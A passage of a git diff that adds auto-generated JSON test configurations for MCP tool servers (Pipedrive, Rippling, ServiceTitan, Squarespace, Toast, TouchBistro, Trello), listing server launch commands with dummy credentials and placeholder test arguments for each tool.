"update_deal:empty-currency": { + "args": { + "id": 50, + "title": "test_value", + "value": 50, + "currency": "", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "lost_reason": "test_value", + "won_time": "test_value", + "lost_time": "test_value" + }, + "expect": "exists" + }, + "update_deal:empty-status": { + "args": { + "id": 50, + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "", + "expected_close_date": "test_value", + "probability": 50, + "lost_reason": "test_value", + "won_time": "test_value", + "lost_time": "test_value" + }, + "expect": "exists" + }, + "update_deal:empty-expected_close_date": { + "args": { + "id": 50, + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "", + "probability": 50, + "lost_reason": "test_value", + "won_time": "test_value", + "lost_time": "test_value" + }, + "expect": "exists" + }, + "update_deal:empty-lost_reason": { + "args": { + "id": 50, + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "lost_reason": "", + "won_time": "test_value", + "lost_time": "test_value" + }, + "expect": "exists" + }, + "update_deal:empty-won_time": { + "args": { + "id": 50, + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "lost_reason": "test_value", + "won_time": "", + "lost_time": "test_value" + }, + "expect": "exists" + }, + "update_deal:empty-lost_time": { + "args": { + "id": 50, + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "lost_reason": "test_value", + "won_time": "test_value", + "lost_time": "" + }, + "expect": "exists" + }, + "list_persons": { + "args": { + "start": 50, + "limit": 50, + "sort": "test_value", + "filter_id": 50, + "first_char": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_persons:empty-sort": { + "args": { + "start": 50, + "limit": 50, + "sort": "", + "filter_id": 50, + "first_char": "test_value" + }, + "expect": "exists" + }, + "list_persons:empty-first_char": { + "args": { + "start": 50, + "limit": 50, + "sort": "test_value", + "filter_id": 50, + "first_char": "" + }, + "expect": "exists" + }, + "create_person": { + "args": { + "name": "Test Name", + "email": [], + "phone": [], + "org_id": 50, + "visible_to": 50, + "add_time": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_person:empty-add_time": { + "args": { + "name": "Test Name", + "email": [], + "phone": [], + "org_id": 50, + "visible_to": 50, + "add_time": "" + }, + "expect": "exists" + }, + "list_activities": { + "args": { + "start": 50, + "limit": 50, + "user_id": 50, + "type": "test_value", + "done": 50, + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_activities:empty-type": { + "args": { + "start": 50, + "limit": 50, + "user_id": 50, + "type": "", + "done": 50, + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "exists" + }, + "list_activities:empty-start_date": { + "args": { + "start": 50, + "limit": 50, + "user_id": 50, + "type": "test_value", + "done": 50, + "start_date": "", + "end_date": "test_value" + }, + "expect": "exists" + }, + "list_activities:empty-end_date": { + "args": { + "start": 50, + "limit": 50, + "user_id": 50, + "type": "test_value", + "done": 50, + "start_date": "test_value", + "end_date": "" + }, + "expect": "exists" + }, + "add_activity": { + "args": { + "subject": "test_value", + "type": "test_value", + "due_date": "test_value", + "due_time": "test_value", + "duration": "test_value", + "deal_id": 50, + "person_id": 50, + "org_id": 50, + "note": "test_value", + "done": 50, + "busy_flag": true, + "participants": [] + }, + "expect": "content && content.length > 0" + }, + "add_activity:empty-type": { + "args": { + "subject": "test_value", + "type": "", + "due_date": "test_value", + "due_time": "test_value", + "duration": "test_value", + "deal_id": 50, + "person_id": 50, + "org_id": 50, + "note": "test_value", + "done": 50, + "busy_flag": true, + "participants": [] + }, + "expect": "exists" + }, + "add_activity:empty-due_date": { + "args": { + "subject": "test_value", + "type": "test_value", + "due_date": "", + "due_time": "test_value", + "duration": "test_value", + "deal_id": 50, + "person_id": 50, + "org_id": 50, + "note": "test_value", + "done": 50, + "busy_flag": true, + "participants": [] + }, + "expect": "exists" + }, + "add_activity:empty-due_time": { + "args": { + "subject": "test_value", + "type": "test_value", + "due_date": "test_value", + "due_time": "", + "duration": "test_value", + "deal_id": 50, + "person_id": 50, + "org_id": 50, + "note": "test_value", + "done": 50, + "busy_flag": true, + "participants": [] + }, + "expect": "exists" + }, + "add_activity:empty-duration": { + "args": { + "subject": "test_value", + "type": "test_value", + "due_date": "test_value", + "due_time": "test_value", + "duration": "", + "deal_id": 50, + "person_id": 50, + "org_id": 50, + "note": "test_value", + "done": 50, + "busy_flag": true, + "participants": [] + }, + "expect": "exists" + }, + "add_activity:empty-note": { + "args": { + "subject": "test_value", + "type": "test_value", + "due_date": "test_value", + "due_time": "test_value", + "duration": "test_value", + "deal_id": 50, + "person_id": 50, + "org_id": 50, + "note": "", + "done": 50, + "busy_flag": true, + "participants": [] + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/pipedrive.json b/factory-tools/test-configs/pipedrive.json new file mode 100644 index 0000000..8ff41c3 --- /dev/null +++ b/factory-tools/test-configs/pipedrive.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/pipedrive/dist/index.js" + ], + "env": { + "PIPEDRIVE_API_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/rippling-tests.json b/factory-tools/test-configs/rippling-tests.json new file mode 100644 index 0000000..55cf726 --- /dev/null +++ b/factory-tools/test-configs/rippling-tests.json @@ -0,0 +1,179 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/rippling/dist/index.js" + ], + "env": { + "RIPPLING_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_employees": { + "args": { + "limit": 50, + "offset": 50, + "include_terminated": true + }, + "expect": "content && content.length > 0" + }, + "get_employee": { + "args": { + "employee_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_departments": { + "args": { + "limit": 50, + "offset": 50 + }, + "expect": "content && content.length > 0" + }, + "list_teams": { + "args": { + "limit": 50, + "offset": 50 + }, + "expect": "content && content.length > 0" + }, + "get_payroll": { + "args": { + "employee_id": "test-id-123", + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_payroll:empty-employee_id": { + "args": { + "employee_id": "", + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "exists" + }, + "get_payroll:empty-start_date": { + "args": { + "employee_id": "test-id-123", + "start_date": "", + "end_date": "test_value" + }, + "expect": "exists" + }, + "get_payroll:empty-end_date": { + "args": { + "employee_id": "test-id-123", + "start_date": "test_value", + "end_date": "" + }, + "expect": "exists" + }, + "list_devices": { + "args": { + "limit": 50, + "offset": 50, + "employee_id": "test-id-123", + "device_type": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_devices:empty-employee_id": { + "args": { + "limit": 50, + "offset": 50, + "employee_id": "", + "device_type": "test_value" + }, + "expect": "exists" + }, + "list_devices:empty-device_type": { + "args": { + "limit": 50, + "offset": 50, + "employee_id": "test-id-123", + "device_type": "" + }, + "expect": "exists" + }, + "list_apps": { + "args": { + "limit": 50, + "offset": 50 + }, + "expect": "content && content.length > 0" + }, + "get_company": { + "args": {}, + "expect": "content && content.length > 0" + }, + "list_groups": { + "args": {}, + "expect": "content && content.length > 0" + }, + "list_levels": { + "args": { + "limit": 50, + "offset": 50 + }, + "expect": "content && content.length > 0" + }, + "list_work_locations": { + "args": { + "limit": 50, + "offset": 50 + }, + "expect": "content && content.length > 0" + }, + "get_leave_requests": { + "args": { + "employee_id": "test-id-123", + "status": "test_value", + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_leave_requests:empty-employee_id": { + "args": { + "employee_id": "", + "status": "test_value", + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "exists" + }, + "get_leave_requests:empty-status": { + "args": { + "employee_id": "test-id-123", + "status": "", + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "exists" + }, + "get_leave_requests:empty-start_date": { + "args": { + "employee_id": "test-id-123", + "status": "test_value", + "start_date": "", + "end_date": "test_value" + }, + "expect": "exists" + }, + "get_leave_requests:empty-end_date": { + "args": { + "employee_id": "test-id-123", + "status": "test_value", + "start_date": "test_value", + "end_date": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/rippling.json b/factory-tools/test-configs/rippling.json new file mode 100644 index 0000000..d74a357 --- /dev/null +++ b/factory-tools/test-configs/rippling.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/rippling/dist/index.js" + ], + "env": { + "RIPPLING_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/servicetitan-tests.json b/factory-tools/test-configs/servicetitan-tests.json new file mode 100644 index 0000000..eb5bdc2 --- /dev/null +++ b/factory-tools/test-configs/servicetitan-tests.json @@ -0,0 +1,288 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/servicetitan/dist/index.js" + ], + "env": { + "SERVICETITAN_CLIENT_ID": "factory_discovery_dummy", + "SERVICETITAN_CLIENT_SECRET": "factory_discovery_dummy", + "SERVICETITAN_TENANT_ID": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_jobs": { + "args": { + "page": 50, + "pageSize": 50, + "status": "test_value", + "customerId": 50, + "technicianId": 50, + "createdOnOrAfter": "test_value", + "completedOnOrAfter": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_jobs:empty-status": { + "args": { + "page": 50, + "pageSize": 50, + "status": "", + "customerId": 50, + "technicianId": 50, + "createdOnOrAfter": "test_value", + "completedOnOrAfter": "test_value" + }, + "expect": "exists" + }, + "list_jobs:empty-createdOnOrAfter": { + "args": { + "page": 50, + "pageSize": 50, + "status": "test_value", + "customerId": 50, + "technicianId": 50, + "createdOnOrAfter": "", + "completedOnOrAfter": "test_value" + }, + "expect": "exists" + }, + "list_jobs:empty-completedOnOrAfter": { + "args": { + "page": 50, + "pageSize": 50, + "status": "test_value", + "customerId": 50, + "technicianId": 50, + "createdOnOrAfter": "test_value", + "completedOnOrAfter": "" + }, + "expect": "exists" + }, + "get_job": { + "args": { + "job_id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_job": { + "args": { + "customerId": 50, + "locationId": 50, + "jobTypeId": 50, + "priority": "test_value", + "businessUnitId": 50, + "campaignId": 50, + "summary": "test_value", + "scheduledStart": "test_value", + "scheduledEnd": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_job:empty-priority": { + "args": { + "customerId": 50, + "locationId": 50, + "jobTypeId": 50, + "priority": "", + "businessUnitId": 50, + "campaignId": 50, + "summary": "test_value", + "scheduledStart": "test_value", + "scheduledEnd": "test_value" + }, + "expect": "exists" + }, + "create_job:empty-summary": { + "args": { + "customerId": 50, + "locationId": 50, + "jobTypeId": 50, + "priority": "test_value", + "businessUnitId": 50, + "campaignId": 50, + "summary": "", + "scheduledStart": "test_value", + "scheduledEnd": "test_value" + }, + "expect": "exists" + }, + "create_job:empty-scheduledStart": { + "args": { + "customerId": 50, + "locationId": 50, + "jobTypeId": 50, + "priority": "test_value", + "businessUnitId": 50, + "campaignId": 50, + "summary": "test_value", + "scheduledStart": "", + "scheduledEnd": "test_value" + }, + "expect": "exists" + }, + "create_job:empty-scheduledEnd": { + "args": { + "customerId": 50, + "locationId": 50, + "jobTypeId": 50, + "priority": "test_value", + "businessUnitId": 50, + "campaignId": 50, + "summary": "test_value", + "scheduledStart": "test_value", + "scheduledEnd": "" + }, + "expect": "exists" + }, + "list_customers": { + "args": { + "page": 50, + "pageSize": 50, + "name": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "createdOnOrAfter": "test_value", + "active": true + }, + "expect": "content && content.length > 0" + }, + "list_customers:empty-name": { + "args": { + "page": 50, + "pageSize": 50, + "name": "", + "email": "test@example.com", + "phone": "test_value", + "createdOnOrAfter": "test_value", + "active": true + }, + "expect": "exists" + }, + "list_customers:empty-email": { + "args": { + "page": 50, + "pageSize": 50, + "name": "Test Name", + "email": "", + "phone": "test_value", + "createdOnOrAfter": "test_value", + "active": true + }, + "expect": "exists" + }, + "list_customers:empty-phone": { + "args": { + "page": 50, + "pageSize": 50, + "name": "Test Name", + "email": "test@example.com", + "phone": "", + "createdOnOrAfter": "test_value", + "active": true + }, + "expect": "exists" + }, + "list_customers:empty-createdOnOrAfter": { + "args": { + "page": 50, + "pageSize": 50, + "name": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "createdOnOrAfter": "", + "active": true + }, + "expect": "exists" + }, + "get_customer": { + "args": { + "customer_id": 50 + }, + "expect": "content && content.length > 0" + }, + "list_invoices": { + "args": { + "page": 50, + "pageSize": 50, + "status": "test_value", + "customerId": 50, + "jobId": 50, + "createdOnOrAfter": "test_value", + "total_gte": 50 + }, + "expect": "content && content.length > 0" + }, + "list_invoices:empty-status": { + "args": { + "page": 50, + "pageSize": 50, + "status": "", + "customerId": 50, + "jobId": 50, + "createdOnOrAfter": "test_value", + "total_gte": 50 + }, + "expect": "exists" + }, + "list_invoices:empty-createdOnOrAfter": { + "args": { + "page": 50, + "pageSize": 50, + "status": "test_value", + "customerId": 50, + "jobId": 50, + "createdOnOrAfter": "", + "total_gte": 50 + }, + "expect": "exists" + }, + "list_technicians": { + "args": { + "page": 50, + "pageSize": 50, + "active": true, + "businessUnitId": 50 + }, + "expect": "content && content.length > 0" + }, + "list_appointments": { + "args": { + "page": 50, + "pageSize": 50, + "startsOnOrAfter": "test_value", + "startsOnOrBefore": "test_value", + "technicianId": 50, + "jobId": 50 + }, + "expect": "content && content.length > 0" + }, + "list_appointments:empty-startsOnOrAfter": { + "args": { + "page": 50, + "pageSize": 50, + "startsOnOrAfter": "", + "startsOnOrBefore": "test_value", + "technicianId": 50, + "jobId": 50 + }, + "expect": "exists" + }, + "list_appointments:empty-startsOnOrBefore": { + "args": { + "page": 50, + "pageSize": 50, + "startsOnOrAfter": "test_value", + "startsOnOrBefore": "", + "technicianId": 50, + "jobId": 50 + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/servicetitan.json b/factory-tools/test-configs/servicetitan.json new file mode 100644 index 0000000..14e0154 --- /dev/null +++ b/factory-tools/test-configs/servicetitan.json @@ -0,0 +1,13 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/servicetitan/dist/index.js" + ], + "env": { + "SERVICETITAN_CLIENT_ID": "factory_discovery_dummy", + "SERVICETITAN_CLIENT_SECRET": "factory_discovery_dummy", + "SERVICETITAN_TENANT_ID": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/squarespace-tests.json b/factory-tools/test-configs/squarespace-tests.json new file mode 100644 index 0000000..9e30cd0 --- /dev/null +++ b/factory-tools/test-configs/squarespace-tests.json @@ -0,0 +1,159 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/squarespace/dist/index.js" + ], + "env": { + "SQUARESPACE_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_pages": { + "args": { + "cursor": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_pages:empty-cursor": { + "args": { + "cursor": "" + }, + "expect": "exists" + }, + "get_page": { + "args": { + "pageId": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_products": { + "args": { + "cursor": "test_value", + "modifiedAfter": "test_value", + "modifiedBefore": "test_value", + "type": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_products:empty-cursor": { + "args": { + "cursor": "", + "modifiedAfter": "test_value", + "modifiedBefore": "test_value", + "type": "test_value" + }, + "expect": "exists" + }, + "list_products:empty-modifiedAfter": { + "args": { + "cursor": "test_value", + "modifiedAfter": "", + "modifiedBefore": "test_value", + "type": "test_value" + }, + "expect": "exists" + }, + "list_products:empty-modifiedBefore": { + "args": { + "cursor": "test_value", + "modifiedAfter": "test_value", + "modifiedBefore": "", + "type": "test_value" + }, + "expect": "exists" + }, + "list_products:empty-type": { + "args": { + "cursor": "test_value", + "modifiedAfter": "test_value", + "modifiedBefore": "test_value", + "type": "" + }, + "expect": "exists" + }, + "get_product": { + "args": { + "productId": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_orders": { + "args": { + "cursor": "test_value", + "modifiedAfter": "test_value", + "modifiedBefore": "test_value", + "fulfillmentStatus": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_orders:empty-cursor": { + "args": { + "cursor": "", + "modifiedAfter": "test_value", + "modifiedBefore": "test_value", + "fulfillmentStatus": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-modifiedAfter": { + "args": { + "cursor": "test_value", + "modifiedAfter": "", + "modifiedBefore": "test_value", + "fulfillmentStatus": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-modifiedBefore": { + "args": { + "cursor": "test_value", + "modifiedAfter": "test_value", + "modifiedBefore": "", + "fulfillmentStatus": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-fulfillmentStatus": { + "args": { + "cursor": "test_value", + "modifiedAfter": "test_value", + "modifiedBefore": "test_value", + "fulfillmentStatus": "" + }, + "expect": "exists" + }, + "get_order": { + "args": { + "orderId": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_inventory": { + "args": { + "cursor": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_inventory:empty-cursor": { + "args": { + "cursor": "" + }, + "expect": "exists" + }, + "update_inventory": { + "args": { + "variantId": "test-id-123", + "quantity": 50, + "quantityDelta": 50, + "isUnlimited": true + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/squarespace.json b/factory-tools/test-configs/squarespace.json new file mode 100644 index 0000000..ebb7c81 --- /dev/null +++ b/factory-tools/test-configs/squarespace.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/squarespace/dist/index.js" + ], + "env": { + "SQUARESPACE_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/toast-tests.json b/factory-tools/test-configs/toast-tests.json new file mode 100644 index 0000000..a31cff4 --- /dev/null +++ b/factory-tools/test-configs/toast-tests.json @@ -0,0 +1,188 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/toast/dist/index.js" + ], + "env": { + "TOAST_CLIENT_ID": "factory_discovery_dummy", + "TOAST_CLIENT_SECRET": "factory_discovery_dummy", + "TOAST_RESTAURANT_GUID": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_orders": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "page_size": 50, + "page_token": "test_value", + "business_date": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_orders:empty-page_token": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "page_size": 50, + "page_token": "", + "business_date": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-business_date": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "page_size": 50, + "page_token": "test_value", + "business_date": "" + }, + "expect": "exists" + }, + "get_order": { + "args": { + "order_guid": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_menu_items": { + "args": { + "menu_guid": "test-id-123", + "include_modifiers": true + }, + "expect": "content && content.length > 0" + }, + "list_menu_items:empty-menu_guid": { + "args": { + "menu_guid": "", + "include_modifiers": true + }, + "expect": "exists" + }, + "update_menu_item": { + "args": { + "item_guid": "test-id-123", + "quantity": "test_value", + "status": "test_value" + }, + "expect": "content && content.length > 0" + }, + "update_menu_item:empty-quantity": { + "args": { + "item_guid": "test-id-123", + "quantity": "", + "status": "test_value" + }, + "expect": "exists" + }, + "update_menu_item:empty-status": { + "args": { + "item_guid": "test-id-123", + "quantity": "test_value", + "status": "" + }, + "expect": "exists" + }, + "list_employees": { + "args": { + "page_size": 50, + "page_token": "test_value", + "include_archived": true + }, + "expect": "content && content.length > 0" + }, + "list_employees:empty-page_token": { + "args": { + "page_size": 50, + "page_token": "", + "include_archived": true + }, + "expect": "exists" + }, + "get_labor": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "employee_guid": "test-id-123", + "page_size": 50, + "page_token": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_labor:empty-employee_guid": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "employee_guid": "", + "page_size": 50, + "page_token": "test_value" + }, + "expect": "exists" + }, + "get_labor:empty-page_token": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "employee_guid": "test-id-123", + "page_size": 50, + "page_token": "" + }, + "expect": "exists" + }, + "list_checks": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "page_size": 50, + "page_token": "test_value", + "check_status": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_checks:empty-page_token": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "page_size": 50, + "page_token": "", + "check_status": "test_value" + }, + "expect": "exists" + }, + "list_checks:empty-check_status": { + "args": { + "start_date": "test_value", + "end_date": "test_value", + "page_size": 50, + "page_token": "test_value", + "check_status": "" + }, + "expect": "exists" + }, + "void_check": { + "args": { + "order_guid": "test-id-123", + "check_guid": "test-id-123", + "void_reason": "test-id-123", + "void_business_date": 50 + }, + "expect": "content && content.length > 0" + }, + "void_check:empty-void_reason": { + "args": { + "order_guid": "test-id-123", + "check_guid": "test-id-123", + "void_reason": "", + "void_business_date": 50 + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/toast.json b/factory-tools/test-configs/toast.json new file mode 100644 index 0000000..fb43986 --- /dev/null +++ b/factory-tools/test-configs/toast.json @@ -0,0 +1,13 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/toast/dist/index.js" + ], + "env": { + "TOAST_CLIENT_ID": "factory_discovery_dummy", + "TOAST_CLIENT_SECRET": "factory_discovery_dummy", + "TOAST_RESTAURANT_GUID": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/touchbistro-tests.json b/factory-tools/test-configs/touchbistro-tests.json new file mode 100644 index 0000000..a42add5 --- /dev/null +++ b/factory-tools/test-configs/touchbistro-tests.json @@ -0,0 +1,250 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/touchbistro/dist/index.js" + ], + "env": { + "TOUCHBISTRO_API_KEY": "factory_discovery_dummy", + "TOUCHBISTRO_VENUE_ID": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_orders": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "orderType": "dine_in", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_orders:empty-status": { + "args": { + "page": 50, + "pageSize": 50, + "status": "", + "orderType": "dine_in", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-orderType": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "orderType": "", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-startDate": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "orderType": "dine_in", + "startDate": "", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-endDate": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "orderType": "dine_in", + "startDate": "test_value", + "endDate": "" + }, + "expect": "exists" + }, + "get_order": { + "args": { + "id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_menu_items": { + "args": { + "page": 50, + "pageSize": 50, + "categoryId": "test-id-123", + "active": true + }, + "expect": "content && content.length > 0" + }, + "list_menu_items:empty-categoryId": { + "args": { + "page": 50, + "pageSize": 50, + "categoryId": "", + "active": true + }, + "expect": "exists" + }, + "list_reservations": { + "args": { + "page": 50, + "pageSize": 50, + "date": "test_value", + "status": "pending", + "partySize": 50 + }, + "expect": "content && content.length > 0" + }, + "list_reservations:empty-date": { + "args": { + "page": 50, + "pageSize": 50, + "date": "", + "status": "pending", + "partySize": 50 + }, + "expect": "exists" + }, + "list_reservations:empty-status": { + "args": { + "page": 50, + "pageSize": 50, + "date": "test_value", + "status": "", + "partySize": 50 + }, + "expect": "exists" + }, + "create_reservation": { + "args": { + "customerName": "Test Name", + "customerPhone": "test_value", + "customerEmail": "test@example.com", + "partySize": 50, + "date": "test_value", + "time": "test_value", + "tableId": "test-id-123", + "notes": "test_value", + "source": "phone" + }, + "expect": "content && content.length > 0" + }, + "create_reservation:empty-customerPhone": { + "args": { + "customerName": "Test Name", + "customerPhone": "", + "customerEmail": "test@example.com", + "partySize": 50, + "date": "test_value", + "time": "test_value", + "tableId": "test-id-123", + "notes": "test_value", + "source": "phone" + }, + "expect": "exists" + }, + "create_reservation:empty-customerEmail": { + "args": { + "customerName": "Test Name", + "customerPhone": "test_value", + "customerEmail": "", + "partySize": 50, + "date": "test_value", + "time": "test_value", + "tableId": "test-id-123", + "notes": "test_value", + "source": "phone" + }, + "expect": "exists" + }, + "create_reservation:empty-tableId": { + "args": { + "customerName": "Test Name", + "customerPhone": "test_value", + "customerEmail": "test@example.com", + "partySize": 50, + "date": "test_value", + "time": "test_value", + "tableId": "", + "notes": "test_value", + "source": "phone" + }, + "expect": "exists" + }, + "create_reservation:empty-notes": { + "args": { + "customerName": "Test Name", + "customerPhone": "test_value", + "customerEmail": "test@example.com", + "partySize": 50, + "date": "test_value", + "time": "test_value", + "tableId": "test-id-123", + "notes": "", + "source": "phone" + }, + "expect": "exists" + }, + "create_reservation:empty-source": { + "args": { + "customerName": "Test Name", + "customerPhone": "test_value", + "customerEmail": "test@example.com", + "partySize": 50, + "date": "test_value", + "time": "test_value", + "tableId": "test-id-123", + "notes": "test_value", + "source": "" + }, + "expect": "exists" + }, + "list_staff": { + "args": { + "page": 50, + "pageSize": 50, + "role": "server", + "active": true + }, + "expect": "content && content.length > 0" + }, + "list_staff:empty-role": { + "args": { + "page": 50, + "pageSize": 50, + "role": "", + "active": true + }, + "expect": "exists" + }, + "get_sales_report": { + "args": { + "startDate": "test_value", + "endDate": "test_value", + "groupBy": "day", + "includeVoids": true, + "includeRefunds": true + }, + "expect": "content && content.length > 0" + }, + "get_sales_report:empty-groupBy": { + "args": { + "startDate": "test_value", + "endDate": "test_value", + "groupBy": "", + "includeVoids": true, + "includeRefunds": true + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/touchbistro.json b/factory-tools/test-configs/touchbistro.json new file mode 100644 index 0000000..036f1b0 --- /dev/null +++ b/factory-tools/test-configs/touchbistro.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/touchbistro/dist/index.js" + ], + "env": { + "TOUCHBISTRO_API_KEY": "factory_discovery_dummy", + "TOUCHBISTRO_VENUE_ID": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/trello-tests.json b/factory-tools/test-configs/trello-tests.json new file mode 100644 index 0000000..d9f9bfd --- /dev/null +++ b/factory-tools/test-configs/trello-tests.json @@ -0,0 +1,346 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/trello/dist/index.js" + ], + "env": { + "TRELLO_API_KEY": "factory_discovery_dummy", + "TRELLO_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_boards": { + "args": { + "filter": "all", + "fields": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_boards:empty-filter": { + "args": { + "filter": "", + "fields": "test_value" + }, + "expect": "exists" + }, + "list_boards:empty-fields": { + "args": { + "filter": "all", + "fields": "" + }, + "expect": "exists" + }, + "get_board": { + "args": { + "board_id": "test-id-123", + "lists": "all", + "cards": "all", + "members": true + }, + "expect": "content && content.length > 0" + }, + "get_board:empty-lists": { + "args": { + "board_id": "test-id-123", + "lists": "", + "cards": "all", + "members": true + }, + "expect": "exists" + }, + "get_board:empty-cards": { + "args": { + "board_id": "test-id-123", + "lists": "all", + "cards": "", + "members": true + }, + "expect": "exists" + }, + "list_lists": { + "args": { + "board_id": "test-id-123", + "filter": "all", + "cards": "all" + }, + "expect": "content && content.length > 0" + }, + "list_lists:empty-filter": { + "args": { + "board_id": "test-id-123", + "filter": "", + "cards": "all" + }, + "expect": "exists" + }, + "list_lists:empty-cards": { + "args": { + "board_id": "test-id-123", + "filter": "all", + "cards": "" + }, + "expect": "exists" + }, + "list_cards": { + "args": { + 